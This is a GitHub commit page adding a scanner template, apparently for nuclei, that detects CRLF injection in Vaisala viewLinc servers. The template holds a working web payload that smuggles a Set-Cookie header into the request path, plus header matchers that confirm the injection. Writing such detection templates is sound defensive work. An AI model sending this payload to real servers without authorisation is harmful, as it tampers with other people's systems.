Merge pull request #1089 from geeknik/patch-47

Create viewlinc-crlf-injection.yaml
patch-1
PD-Team 2021-03-16 14:06:59 +05:30 committed by GitHub
commit a1d79964b8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: viewlinc-crlf-injection
info:
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
author: geeknik
severity: low
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
tags: crlf,viewlinc
requests:
- method: GET
path:
- "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection"
matchers-condition: or
matchers:
- type: word
words:
- "Server: viewLinc/5.1.2.367"
- "Set-Cookie: crlfinjection=crlfinjection"
part: header
condition: and
- type: word
words:
- "Server: viewLinc/5.1.1.50"
- "Set-Cookie: crlfinjection=crlfinjection"
part: header
condition: and